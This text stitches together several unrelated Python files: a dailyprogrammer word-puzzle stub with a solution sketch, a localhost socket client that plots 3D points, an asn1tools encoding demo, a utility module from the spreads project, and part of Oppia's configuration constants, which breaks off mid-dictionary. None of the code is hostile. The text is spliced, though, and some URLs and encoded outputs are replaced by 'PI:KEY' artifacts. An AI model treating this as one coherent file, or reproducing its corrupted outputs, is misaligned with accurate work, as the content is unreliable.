0 | """
[2014-11-26] Challenge #190 [Intermediate] Words inside of words
https://www.reddit.PI:KEY
#Description
This week's challenge is a short yet interesting one that should hopefully help you exercise elegant solutions to a
problem rather than brute-forcing it.
#Challenge
Given the wordlist [enable1.txt](http://www.joereynoldsaudio.com/enable1.txt), you must find the word in that file
which also contains the greatest number of words within that word.
For example, the word 'grayson' has the following words in it
Grayson
Gray
Grays
Ray
Rays
Son
On
Here's another example, the word 'reports' has the following
reports
report
port
ports
rep
You're tasked with finding the word in that file that contains the most words.
NOTE: If you have a different wordlist you would like to use, you're free to do so.
#Restrictions
* To keep output slightly shorter, a word will only be considered a word if it is 2 or more letters in length
* The word you are using may not be permuted to get a different set of words (You can't change 'report' to 'repotr' so
that you can add more words to your list)
#Finally
Have a good challenge idea?
Consider submitting it to /r/dailyprogrammer_ideas
"""
def main():
    pass


if __name__ == "__main__":
    main()
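
A minimal sketch of one possible approach (illustrative only: the helper names are mine, and it assumes enable1.txt has been downloaded next to the script):

def count_contained_words(word, wordset):
    """Count the distinct words of length >= 2 that occur inside `word`."""
    found = set()
    for i in range(len(word)):
        for j in range(i + 2, len(word) + 1):
            if word[i:j] in wordset:
                found.add(word[i:j])
    return len(found)


def solve():
    with open('enable1.txt') as f:
        words = [line.strip().lower() for line in f if line.strip()]
    wordset = {w for w in words if len(w) >= 2}
    best = max(words, key=lambda w: count_contained_words(w, wordset))
    print(best, count_contained_words(best, wordset))

Checking all O(L^2) substrings of each candidate against a set is simple and fast enough for enable1.txt; a trie over the wordlist would avoid rescanning shared prefixes.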
from mpl_toolkits.mplot3d import axes3d
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
from socket import *
import time

# Declare all global variables
HOST = '127.0.0.1'
PORT = 21566
BUFSIZ = 512
ADDR = (HOST, PORT)

bad_packet = 0
good_packet = 0

# fig, ax = plt.subplots()
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')

# Socket
tcpCliSock = socket(AF_INET, SOCK_STREAM)
tcpCliSock.connect(ADDR)

# Don't block on drawing (interactive mode)
plt.ion()

tstart = time.time()

# real-time plotting loop
X, Y, Z = [], [], []
while True:
    try:
        # read data from the network
        data = tcpCliSock.recv(BUFSIZ)
        if data:
            print(len(X), data)
            data = data.decode().split(',')
            if len(data) == 9:
                # print('Data received', data)
                # tcpCliSock.send(b'Ok')
                good_packet += 1
            else:
                bad_packet += 1
                continue
            # the first three fields are the x, y, z coordinates
            X.append(float(data[0]))
            Y.append(float(data[1]))
            Z.append(float(data[2]))
            frame = ax.scatter(X, Y, Z, c='b', marker='o')
            # Remove old line collection before drawing
            # if oldcol is not None:
            #     ax.collections.remove(oldcol)
            plt.pause(0.001 / len(X))
    except KeyboardInterrupt:
        tcpCliSock.close()
        print('FPS: %f' % (len(X) / (time.time() - tstart)))
        break
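
For testing, a minimal counterpart that feeds this loop (hypothetical: the original transmitter is not shown; any process that accepts the connection on 127.0.0.1:21566 and writes comma-separated 9-field packets would do, modulo TCP message framing):

import random
import socket
import time

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(('127.0.0.1', 21566))
srv.listen(1)
conn, _ = srv.accept()
while True:
    # nine comma-separated fields; only the first three are plotted
    fields = [random.random() for _ in range(9)]
    conn.send((','.join('%.3f' % v for v in fields)).encode())
    time.sleep(0.05)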
#!/usr/bin/env python
"""Encoding and decoding of a question once for each codec.
Example execution:
$ ./question.py
ASN.1 specification:
-- A simple protocol taken from Wikipedia.
Foo DEFINITIONS ::= BEGIN
    Question ::= SEQUENCE {
        id       INTEGER,
        question IA5String
    }
    Answer ::= SEQUENCE {
        id     INTEGER,
        answer BOOLEAN
    }
END
Question to encode: {'id': 1, 'question': 'Is 1+1=3?'}
BER:
Encoded: 300e0201011609497320312b313d333f (16 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
DER:
Encoded: 300e0201011609497320312b313d333f (16 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
JER:
Encoded: PI:KEY (31 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
OER:
Encoded: 010109497320312b313d333f (12 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
PER:
Encoded: 010109497320312b313d333f (12 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
UPER:
Encoded: 01010993cd03156c5eb37e (11 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
XER:
Encoded: PI:KEY (61 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
Protocol Buffers:
Encoded: 08011209497320312b313d333f (13 bytes)
Decoded:
id: 1
question: "Is 1+1=3?"
$
"""
from __future__ import print_function
import os
from binascii import hexlify
import asn1tools
from foo_pb2 import Question
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))

FOO_ASN_PATH = os.path.join(SCRIPT_DIR,
                            '..',
                            '..',
                            '..',
                            'tests',
                            'files',
                            'foo.asn')
# Print the specification.
print('ASN.1 specification:')
print()
with open(FOO_ASN_PATH) as fin:
    print(fin.read())
# The question to encode.
question = {'id': 1, 'question': 'Is 1+1=3?'}
print("Question to encode:", question)
# Encode and decode the question once for each codec.
for codec in ['ber', 'der', 'jer', 'oer', 'per', 'uper', 'xer']:
    foo = asn1tools.compile_files(FOO_ASN_PATH, codec)
    encoded = foo.encode('Question', question)
    decoded = foo.decode('Question', encoded)

    print()
    print('{}:'.format(codec.upper()))
    print('Encoded: {} ({} bytes)'.format(hexlify(encoded).decode('ascii'),
                                          len(encoded)))
    print('Decoded:', decoded)
# Also encode using protocol buffers.
question = Question()
question.id = 1
question.question = 'Is 1+1=3?'
encoded = question.SerializeToString()
decoded = question
print()
print('Protocol Buffers:')
print('Encoded: {} ({} bytes)'.format(hexlify(encoded).decode('ascii'),
                                      len(encoded)))
print('Decoded:')
print(decoded)
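
As a sanity check, the 16 BER bytes shown above can be read off by hand; a short sketch (mine, not part of the original example, reusing the names defined in the script) that verifies the round trip for that codec:

# BER encoding 300e0201011609497320312b313d333f breaks down as:
#   30 0e           SEQUENCE, length 14
#   02 01 01        INTEGER 1            (id)
#   16 09 49...3f   IA5String, length 9  ("Is 1+1=3?")
from binascii import unhexlify
foo = asn1tools.compile_files(FOO_ASN_PATH, 'ber')
assert foo.decode('Question', unhexlify('300e0201011609497320312b313d333f')) \
    == {'id': 1, 'question': 'Is 1+1=3?'}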
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Johannes Baiter dummy@email.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Various utility functions and classes.
"""
from __future__ import division, unicode_literals, print_function
import abc
import glob
import json
import logging
import os
import pkg_resources
import platform
import re
import subprocess
from unicodedata import normalize
import blinker
import colorama
import psutil
import roman
from colorama import Fore, Back, Style
from spreads.vendor.pathlib import Path
class SpreadsException(Exception):
    """ General exception """
    pass


class DeviceException(SpreadsException):
    """ Raised when a device-related error occurred. """
    pass


class MissingDependencyException(SpreadsException):
    """ Raised when a dependency for a plugin is missing. """
    pass


def get_version():
    """ Get installed version via pkg_resources. """
    return pkg_resources.require('spreads')[0].version
def find_in_path(name):
    """ Find executable in $PATH.

    :param name: name of the executable
    :type name: unicode
    :returns: Path to executable or None if not found
    :rtype: unicode or None
    """
    candidates = None
    if is_os('windows'):
        import _winreg
        if name.startswith('scantailor'):
            try:
                cmd = _winreg.QueryValue(
                    _winreg.HKEY_CLASSES_ROOT,
                    'Scan Tailor Project\\shell\\open\\command')
                bin_path = cmd.split('" "')[0][1:]
                if name.endswith('-cli'):
                    bin_path = bin_path[:-4] + "-cli.exe"
                return bin_path if os.path.exists(bin_path) else None
            except OSError:
                return None
        else:
            path_dirs = os.environ.get('PATH').split(';')
            path_dirs.append(os.getcwd())
            path_exts = os.environ.get('PATHEXT').split(';')
            candidates = (os.path.join(p, name + e)
                          for p in path_dirs
                          for e in path_exts)
    else:
        candidates = (os.path.join(p, name)
                      for p in os.environ.get('PATH').split(':'))
    return next((c for c in candidates if os.path.exists(c)), None)
def is_os(osname):
    """ Check if the current operating system matches the expected.

    :param osname: Operating system name as returned by
                   :py:func:`platform.system`
    :returns: Whether the OS matches or not
    :rtype: bool
    """
    return platform.system().lower() == osname


def check_futures_exceptions(futures):
    """ Go through passed :py:class:`concurrent.futures._base.Future` objects
    and re-raise the first Exception raised by any one of them.

    :param futures: Iterable that contains the futures to be checked
    :type futures: iterable with :py:class:`concurrent.futures._base.Future`
                   instances
    """
    if any(x.exception() for x in futures):
        raise next(x for x in futures if x.exception()).exception()


def get_free_space(path):
    """ Return free space on file-system underlying the passed path.

    :param path: Path on file-system the free space of which is desired.
    :type path: unicode
    :return: Free space in bytes.
    :rtype: int
    """
    return psutil.disk_usage(unicode(path)).free
def get_subprocess(cmdline, **kwargs):
    """ Get a :py:class:`subprocess.Popen` instance.

    On Windows systems, the process will be run in the background and won't
    open a cmd-window or appear in the taskbar.
    The function signature matches that of the :py:class:`subprocess.Popen`
    initialization method.
    """
    if subprocess.mswindows and 'startupinfo' not in kwargs:
        su = subprocess.STARTUPINFO()
        su.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        su.wShowWindow = subprocess.SW_HIDE
        kwargs['startupinfo'] = su
    return subprocess.Popen(cmdline, **kwargs)


def wildcardify(pathnames):
    """ Try to generate a single path with wildcards that matches all
    `pathnames`.

    :param pathnames: List of pathnames to find a wildcard string for
    :type pathnames: List of str/unicode
    :return: The wildcard string or None if none was found
    :rtype: unicode or None
    """
    wildcard_str = ""
    for idx, char in enumerate(pathnames[0]):
        if all(p[idx] == char for p in pathnames[1:]):
            wildcard_str += char
        elif not wildcard_str or wildcard_str[-1] != "*":
            wildcard_str += "*"
    matched_paths = glob.glob(wildcard_str)
    if not sorted(pathnames) == sorted(matched_paths):
        return None
    return wildcard_str
def diff_dicts(old, new):
    """ Get the difference between two dictionaries.

    :param old: Dictionary to base comparison on
    :type old: dict
    :param new: Dictionary to compare with
    :type new: dict
    :return: A (possibly nested) dictionary containing all items from `new`
             that differ from the ones in `old`
    :rtype: dict
    """
    out = {}
    for key, value in old.iteritems():
        if new[key] != value:
            out[key] = new[key]
        elif isinstance(value, dict):
            diff = diff_dicts(value, new[key])
            if diff:
                out[key] = diff
    return out


def slugify(text, delimiter=u'-'):
    """Generates an ASCII-only slug.

    Code adapted from Flask snippet by Armin Ronacher:
    http://flask.pocoo.org/snippets/5/

    :param text: Text to create slug for
    :type text: unicode
    :param delimiter: Delimiter to use in slug
    :type delimiter: unicode
    :return: The generated slug
    :rtype: unicode
    """
    punctuation_re = r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+'
    result = []
    for word in re.split(punctuation_re, text.lower()):
        word = normalize('NFKD', word).encode('ascii', 'ignore')
        if word:
            result.append(word)
    return unicode(delimiter.join(result))
class _instancemethodwrapper(object):  # noqa
    def __init__(self, callable):
        self.callable = callable
        self.__dontcall__ = False

    def __getattr__(self, key):
        return getattr(self.callable, key)

    def __call__(self, *args, **kwargs):
        if self.__dontcall__:
            raise TypeError('Attempted to call abstract method.')
        return self.callable(*args, **kwargs)


class _classmethod(classmethod):  # noqa
    def __init__(self, func):
        super(_classmethod, self).__init__(func)
        isabstractmethod = getattr(func, '__isabstractmethod__', False)
        if isabstractmethod:
            self.__isabstractmethod__ = isabstractmethod

    def __get__(self, instance, owner):
        result = _instancemethodwrapper(super(_classmethod, self)
                                        .__get__(instance, owner))
        isabstractmethod = getattr(self, '__isabstractmethod__', False)
        if isabstractmethod:
            result.__isabstractmethod__ = isabstractmethod
            abstractmethods = getattr(owner, '__abstractmethods__', None)
            if abstractmethods and result.__name__ in abstractmethods:
                result.__dontcall__ = True
        return result


class abstractclassmethod(_classmethod):  # noqa
    """ New decorator class that implements the @abstractclassmethod decorator
    added in Python 3.3 for Python 2.7.

    Kudos to http://stackoverflow.com/a/13640018/487903
    """
    def __init__(self, func):
        func = abc.abstractmethod(func)
        super(abstractclassmethod, self).__init__(func)
class ColourStreamHandler(logging.StreamHandler):
    """ A colorized output StreamHandler

    Kudos to Leigh MacDonald: http://goo.gl/Lpr6C5
    """
    # Some basic colour scheme defaults
    colours = {
        'DEBUG': Fore.CYAN,
        'INFO': Fore.GREEN,
        'WARN': Fore.YELLOW,
        'WARNING': Fore.YELLOW,
        'ERROR': Fore.RED,
        'CRIT': Back.RED + Fore.WHITE,
        'CRITICAL': Back.RED + Fore.WHITE
    }

    @property
    def is_tty(self):
        """ Check if we are using a "real" TTY. If we are not using a TTY it
        means that the colour output should be disabled.

        :return: Using a TTY status
        :rtype: bool
        """
        try:
            return getattr(self.stream, 'isatty', None)()
        except:
            return False

    def emit(self, record):
        try:
            message = self.format(record)
            if not self.is_tty:
                self.stream.write(message)
            else:
                self.stream.write(self.colours[record.levelname] +
                                  message + Style.RESET_ALL)
            self.stream.write(getattr(self, 'terminator', '\n'))
            self.flush()
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            self.handleError(record)


class EventHandler(logging.Handler):
    """ Subclass of :py:class:`logging.Handler` that emits a
    :py:class:`blinker.base.Signal` whenever a new record is emitted.
    """
    signals = blinker.Namespace()
    on_log_emit = signals.signal('logrecord', doc="""\
    Sent when a log record was emitted.

    :keyword :class:`logging.LogRecord` record: the LogRecord
    """)

    def emit(self, record):
        self.on_log_emit.send(record=record)
def get_data_dir(create=False):
    """ Return (and optionally create) the user's default data directory.

    :param create: Create the data directory if it doesn't exist
    :type create: bool
    :return: Path to the default data directory
    :rtype: unicode
    """
    unix_dir_var = 'XDG_DATA_HOME'
    unix_dir_fallback = '~/.config'
    windows_dir_var = 'APPDATA'
    windows_dir_fallback = '~\\AppData\\Roaming'
    mac_dir = '~/Library/Application Support'
    base_dir = None
    if is_os('darwin'):
        if Path(unix_dir_fallback).exists():
            base_dir = unix_dir_fallback
        else:
            base_dir = mac_dir
    elif is_os('windows'):
        if windows_dir_var in os.environ:
            base_dir = os.environ[windows_dir_var]
        else:
            base_dir = windows_dir_fallback
    else:
        if unix_dir_var in os.environ:
            base_dir = os.environ[unix_dir_var]
        else:
            base_dir = unix_dir_fallback
    app_path = Path(base_dir)/'spreads'
    if create and not app_path.exists():
        app_path.mkdir()
    return unicode(app_path)


def colorize(text, color):
    """ Return text with a new ANSI foreground color.

    :param text: Text to be wrapped
    :param color: ANSI color to wrap text in
    :type color: str (from `colorama.ansi <http://git.io/9qnt0Q>`)
    :return: Colorized text
    """
    return color + text + colorama.Fore.RESET
class RomanNumeral(object):
    """ Number type that represents integers as Roman numerals and that
    can be used in all arithmetic operations applicable to integers.
    """
    @staticmethod
    def is_roman(value):
        """ Check if `value` is a valid Roman numeral.

        :param value: Value to be checked
        :type value: unicode
        :returns: Whether the value is valid or not
        :rtype: bool
        """
        return bool(roman.romanNumeralPattern.match(value))

    def __init__(self, value, case='upper'):
        """ Create a new instance.

        :param value: Value of the instance
        :type value: int, unicode containing valid Roman numeral or
                     :py:class:`RomanNumeral`
        """
        self._val = self._to_int(value)
        self._case = case
        if isinstance(value, basestring) and not self.is_roman(value):
            self._case = 'lower'
        elif isinstance(value, RomanNumeral):
            self._case = value._case

    def _to_int(self, value):
        if isinstance(value, int):
            return value
        elif isinstance(value, basestring) and self.is_roman(value.upper()):
            return roman.fromRoman(value.upper())
        elif isinstance(value, RomanNumeral):
            return value._val
        else:
            raise ValueError("Value must be a valid roman numeral, a string"
                             " representing one or an integer: '{0}'"
                             .format(value))

    def __cmp__(self, other):
        if self._val > self._to_int(other):
            return 1
        elif self._val == self._to_int(other):
            return 0
        elif self._val < self._to_int(other):
            return -1

    def __add__(self, other):
        return RomanNumeral(self._val + self._to_int(other), self._case)

    def __sub__(self, other):
        return RomanNumeral(self._val - self._to_int(other), self._case)

    def __int__(self):
        return self._val

    def __str__(self):
        strval = roman.toRoman(self._val)
        if self._case == 'lower':
            return strval.lower()
        else:
            return strval

    def __unicode__(self):
        return unicode(str(self))

    def __repr__(self):
        return str(self)
class CustomJSONEncoder(json.JSONEncoder):
    """ Custom :py:class:`json.JSONEncoder`.

    Uses an object's `to_dict` method if present for serialization.

    Serializes :py:class:`pathlib.Path` instances to the string
    representation of their relative path to a BagIt-compliant directory or
    their absolute path if not applicable.
    """
    def default(self, obj):
        if hasattr(obj, 'to_dict'):
            return obj.to_dict()
        if isinstance(obj, Path):
            # Serialize paths that belong to a workflow as paths relative to
            # its base directory
            base = next((p for p in obj.parents if (p/'bagit.txt').exists()),
                        None)
            if base:
                return unicode(obj.relative_to(base))
            else:
                return unicode(obj.absolute())
        return json.JSONEncoder.default(self, obj)
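

# A few doctest-style examples of the helpers above (illustrative only, not
# taken from the spreads test suite):
#
#     >>> slugify(u'Ein schöner Titel!')
#     u'ein-schoner-titel'
#     >>> diff_dicts({'a': 1, 'b': 2}, {'a': 1, 'b': 3})
#     {'b': 3}
#     >>> str(RomanNumeral('xiv') + 1)
#     'xv'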
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stores various configuration options and constants for Oppia."""
import copy
import datetime
import os
# Whether to unconditionally log info messages.
DEBUG = False
# The platform for the storage backend. This is used in the model-switching
# code in core/platform.
PLATFORM = 'gae'
# This should be string comparison, since all environment variables
# are converted to string
IS_MINIFIED = os.environ.get('MINIFICATION') == 'True'
# Whether we should serve the development or production experience.
# DEV_MODE should only be changed to False in the production environment.
# To use minified resources in the development environment,
# change the MINIFICATION env variable in app.yaml to True.
# When DEV_MODE is True, this indicates that we are not running in
# the production App Engine environment, which affects things like
# login/logout URLs,as well as third-party libraries
# that App Engine normally provides.
if PLATFORM == 'gae':
    DEV_MODE = (
        not os.environ.get('SERVER_SOFTWARE')
        or os.environ['SERVER_SOFTWARE'].startswith('Development'))
else:
    raise Exception('Invalid platform: expected one of [\'gae\']')
TESTS_DATA_DIR = os.path.join('core', 'tests', 'data')
SAMPLE_EXPLORATIONS_DIR = os.path.join('data', 'explorations')
SAMPLE_COLLECTIONS_DIR = os.path.join('data', 'collections')
INTERACTIONS_DIR = os.path.join('extensions', 'interactions')
GADGETS_DIR = os.path.join('extensions', 'gadgets')
RTE_EXTENSIONS_DIR = os.path.join('extensions', 'rich_text_components')
OBJECT_TEMPLATES_DIR = os.path.join('extensions', 'objects', 'templates')
# Choose production template if minification flag is used or
# if in production mode
TEMPLATES_DIR_PREFIX = 'prod' if (IS_MINIFIED or not DEV_MODE) else 'dev'
FRONTEND_TEMPLATES_DIR = os.path.join(
    'core', 'templates', TEMPLATES_DIR_PREFIX, 'head')
DEPENDENCIES_TEMPLATES_DIR = os.path.join('extensions', 'dependencies')
VALUE_GENERATORS_DIR = os.path.join('extensions', 'value_generators')
OBJECT_DEFAULT_VALUES_FILE_PATH = os.path.join(
    'extensions', 'interactions', 'object_defaults.json')
RULES_DESCRIPTIONS_FILE_PATH = os.path.join(
    os.getcwd(), 'extensions', 'interactions', 'rules.json')
# The maximum number of results to retrieve in a datastore query.
DEFAULT_QUERY_LIMIT = 1000
# The maximum number of results to retrieve in a datastore query
# for top rated published explorations in /library page.
NUMBER_OF_TOP_RATED_EXPLORATIONS_FOR_LIBRARY_PAGE = 8
# The maximum number of results to retrieve in a datastore query
# for recently published explorations in /library page.
RECENTLY_PUBLISHED_QUERY_LIMIT_FOR_LIBRARY_PAGE = 8
# The maximum number of results to retrieve in a datastore query
# for top rated published explorations in /library/top_rated page.
NUMBER_OF_TOP_RATED_EXPLORATIONS_FULL_PAGE = 20
# The maximum number of results to retrieve in a datastore query
# for recently published explorations in /library/recently_published page.
RECENTLY_PUBLISHED_QUERY_LIMIT_FULL_PAGE = 20
# The current version of the dashboard stats blob schema. If any backward-
# incompatible changes are made to the stats blob schema in the data store,
# this version number must be changed.
CURRENT_DASHBOARD_STATS_SCHEMA_VERSION = 1
# The current version of the exploration states blob schema. If any backward-
# incompatible changes are made to the states blob schema in the data store,
# this version number must be changed and the exploration migration job
# executed.
CURRENT_EXPLORATION_STATES_SCHEMA_VERSION = 7
# The current version of the all collection blob schemas (such as the nodes
# structure within the Collection domain object). If any backward-incompatible
# changes are made to any of the blob schemas in the data store, this version
# number must be changed.
CURRENT_COLLECTION_SCHEMA_VERSION = 2
# The default number of exploration tiles to load at a time in the search
# results page.
SEARCH_RESULTS_PAGE_SIZE = 20
# The default number of commits to show on a page in the exploration history
# tab.
COMMIT_LIST_PAGE_SIZE = 50
# The default number of items to show on a page in the exploration feedback
# tab.
FEEDBACK_TAB_PAGE_SIZE = 20
# Default title for a newly-minted exploration.
DEFAULT_EXPLORATION_TITLE = ''
# Default category for a newly-minted exploration.
DEFAULT_EXPLORATION_CATEGORY = ''
# Default objective for a newly-minted exploration.
DEFAULT_EXPLORATION_OBJECTIVE = ''
# Default name for the initial state of an exploration.
DEFAULT_INIT_STATE_NAME = 'Introduction'
# The default content text for the initial state of an exploration.
DEFAULT_INIT_STATE_CONTENT_STR = ''
# Default title for a newly-minted collection.
DEFAULT_COLLECTION_TITLE = ''
# Default category for a newly-minted collection.
DEFAULT_COLLECTION_CATEGORY = ''
# Default objective for a newly-minted collection.
DEFAULT_COLLECTION_OBJECTIVE = ''
# A dict containing the accepted image formats (as determined by the imghdr
# module) and the corresponding allowed extensions in the filenames of uploaded
# files.
ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS = {
    'jpeg': ['jpg', 'jpeg'],
    'png': ['png'],
    'gif': ['gif']
}
# A string containing the disallowed characters in state or exploration names.
# The underscore is needed because spaces in names must be converted to
# underscores when displayed as part of a URL or key. The other conventions
# here are derived from the Wikipedia guidelines for naming articles.
INVALID_NAME_CHARS = u':#/|_%<>[]{}\ufffd\\' + chr(127)
for ind in range(32):
    INVALID_NAME_CHARS += chr(ind)
# Prefix for data sent from the server to the client via JSON.
XSSI_PREFIX = ')]}\'\n'
# A regular expression for alphanumeric characters.
ALPHANUMERIC_REGEX = r'^[A-Za-z0-9]+$'
# A regular expression for alphanumeric words separated by single spaces.
# Ex.: 'valid name', 'another valid name', but not 'invalid  name' (which
# has two consecutive spaces).
ALPHANUMERIC_SPACE_REGEX = r'^[0-9A-Za-z]+(?:[ ]?[0-9A-Za-z]+)*$'
# A regular expression for tags.
TAG_REGEX = r'^[a-z ]+$'
# Invalid names for parameters used in expressions.
AUTOMATICALLY_SET_PARAMETER_NAMES = ['answer', 'choices']
INVALID_PARAMETER_NAMES = AUTOMATICALLY_SET_PARAMETER_NAMES + [
    'abs', 'all', 'and', 'any', 'else', 'floor', 'if', 'log', 'or',
    'pow', 'round', 'then']
# These are here rather than in rating_services.py to avoid import
# circularities with exp_services.
# TODO (Jacob) Refactor exp_services to remove this problem.
_EMPTY_RATINGS = {'1': 0, '2': 0, '3': 0, '4': 0, '5': 0}
def get_empty_ratings():
    return copy.deepcopy(_EMPTY_RATINGS)
# Empty scaled average rating as a float.
EMPTY_SCALED_AVERAGE_RATING = 0.0
# To use GAE email service.
EMAIL_SERVICE_PROVIDER_GAE = 'gae_email_service'
# To use mailgun email service.
EMAIL_SERVICE_PROVIDER_MAILGUN = 'mailgun_email_service'
# Use GAE email service by default.
EMAIL_SERVICE_PROVIDER = EMAIL_SERVICE_PROVIDER_GAE
# If the Mailgun email API is used, the "None" below should be replaced
# with the Mailgun API key.
MAILGUN_API_KEY = None
# If the Mailgun email API is used, the "None" below should be replaced
# with the Mailgun domain name (ending with mailgun.org).
MAILGUN_DOMAIN_NAME = None
# Committer id for system actions.
SYSTEM_COMMITTER_ID = 'admin'
SYSTEM_EMAIL_ADDRESS = 'dummy@email.com'
ADMIN_EMAIL_ADDRESS = 'dummy@email.com'
NOREPLY_EMAIL_ADDRESS = 'dummy@email.com'
# Ensure that SYSTEM_EMAIL_ADDRESS and ADMIN_EMAIL_ADDRESS are both valid and
# correspond to owners of the app before setting this to True. If
# SYSTEM_EMAIL_ADDRESS is not that of an app owner, email messages from this
# address cannot be sent. If True then emails can be sent to any user.
CAN_SEND_EMAILS = False
# If you want to turn on this facility please check the email templates in the
# send_role_notification_email() function in email_manager.py and modify them
# accordingly.
CAN_SEND_EDITOR_ROLE_EMAILS = False
# If enabled then emails will be sent to creators for feedback messages.
CAN_SEND_FEEDBACK_MESSAGE_EMAILS = False
# Time to wait before sending feedback message emails (currently set to 1
# hour).
DEFAULT_FEEDBACK_MESSAGE_EMAIL_COUNTDOWN_SECS = 3600
# Whether to send an email when new feedback message is received for
# an exploration.
DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE = True
# Whether to send email updates to a user who has not specified a preference.
DEFAULT_EMAIL_UPDATES_PREFERENCE = False
# Whether to send an invitation email when the user is granted
# new role permissions in an exploration.
DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE = True
# Whether to require an email to be sent, following a moderator action.
REQUIRE_EMAIL_ON_MODERATOR_ACTION = False
# Whether to allow custom event reporting to Google Analytics.
CAN_SEND_ANALYTICS_EVENTS = False
# Timespan in minutes before allowing duplicate emails.
DUPLICATE_EMAIL_INTERVAL_MINS = 2
# Number of digits after decimal to which the average ratings value in the
# dashboard is rounded off to.
AVERAGE_RATINGS_DASHBOARD_PRECISION = 2
EMAIL_INTENT_SIGNUP = 'signup'
EMAIL_INTENT_DAILY_BATCH = 'daily_batch'
EMAIL_INTENT_EDITOR_ROLE_NOTIFICATION = 'editor_role_notification'
EMAIL_INTENT_FEEDBACK_MESSAGE_NOTIFICATION = 'feedback_message_notification'
EMAIL_INTENT_SUGGESTION_NOTIFICATION = 'suggestion_notification'
EMAIL_INTENT_REPORT_BAD_CONTENT = 'report_bad_content'
EMAIL_INTENT_MARKETING = 'marketing'
EMAIL_INTENT_PUBLICIZE_EXPLORATION = 'publicize_exploration'
EMAIL_INTENT_UNPUBLISH_EXPLORATION = 'unpublish_exploration'
EMAIL_INTENT_DELETE_EXPLORATION = 'delete_exploration'
MODERATOR_ACTION_PUBLICIZE_EXPLORATION = 'publicize_exploration'
MODERATOR_ACTION_UNPUBLISH_EXPLORATION = 'unpublish_exploration'
DEFAULT_SALUTATION_HTML_FN = (
    lambda recipient_username: 'Hi %s,' % recipient_username)
DEFAULT_SIGNOFF_HTML_FN = (
    lambda sender_username: (
        'Thanks!<br>%s (Oppia moderator)' % sender_username))

VALID_MODERATOR_ACTIONS = {
    MODERATOR_ACTION_PUBLICIZE_EXPLORATION: {
        'email_config': 'publicize_exploration_email_html_body',
        'email_subject_fn': (
            lambda exp_title: (
                'Your Oppia exploration "%s" has been featured!' % exp_title)),
        'email_intent': EMAIL_INTENT_PUBLICIZE_EXPLORATION,
        'email_salutation_html_fn': DEFAULT_SALUTATION_HTML_FN,
        'email_signoff_html_fn': DEFAULT_SIGNOFF_HTML_FN,
    },
    MODERATOR_ACTION_UNPUBLISH_EXPLORATION: {
        'email_config': 'unpublish_exploration_email_html_body',
        'email_subject_fn': (
            lambda exp_title: (
                'Your Oppia exploration "%s" has been unpublished' % exp_title)
        ),
        'email_intent': 'unpublish_exploration',
        'email_salutation_html_fn': DEFAULT_SALUTATION_HTML_FN,
        'email_signoff_html_fn': DEFAULT_SIGNOFF_HTML_FN,
    },
}
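
# Illustrative use of the action table above (hypothetical caller; the real
# dispatch lives in email_manager.py):
#
#     action = VALID_MODERATOR_ACTIONS[MODERATOR_ACTION_UNPUBLISH_EXPLORATION]
#     subject = action['email_subject_fn']('Fractions')
#     # -> 'Your Oppia exploration "Fractions" has been unpublished'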
# Panel properties and other constants for the default skin.
GADGET_PANEL_AXIS_HORIZONTAL = 'horizontal'
PANELS_PROPERTIES = {
    'bottom': {
        'width': 350,
        'height': 100,
        'stackable_axis': GADGET_PANEL_AXIS_HORIZONTAL,
        'pixels_between_gadgets': 80,
        'max_gadgets': 1
    }
}
# When the site terms were last updated, in UTC.
REGISTRATION_PAGE_LAST_UPDATED_UTC = datetime.datetime(2015, 10, 14, 2, 40, 0)
# Format of string for dashboard statistics logs.
# NOTE TO DEVELOPERS: This format should not be changed, since it is used in
# the existing storage models for UserStatsModel.
DASHBOARD_STATS_DATETIME_STRING_FORMAT = '%Y-%m-%d'
# The maximum size of an uploaded file, in bytes.
MAX_FILE_SIZE_BYTES = 1048576
# The default language code for an exploration.
DEFAULT_LANGUAGE_CODE = 'en'
# The id of the default skin.
# TODO(sll): Deprecate this; it is no longer used.
DEFAULT_SKIN_ID = 'conversation_v1'
# The prefix for an 'accepted suggestion' commit message.
COMMIT_MESSAGE_ACCEPTED_SUGGESTION_PREFIX = 'Accepted suggestion by'
# User id and username for exploration migration bot. Commits made by this bot
# are not reflected in the exploration summary models, but are recorded in the
# exploration commit log.
MIGRATION_BOT_USER_ID = 'OppiaMigrationBot'
MIGRATION_BOT_USERNAME = 'OppiaMigrationBot'
# Ids and locations of the permitted extensions.
ALLOWED_RTE_EXTENSIONS = {
    'Collapsible': {
        'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Collapsible')
    },
    'Image': {
        'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Image')
    },
    'Link': {
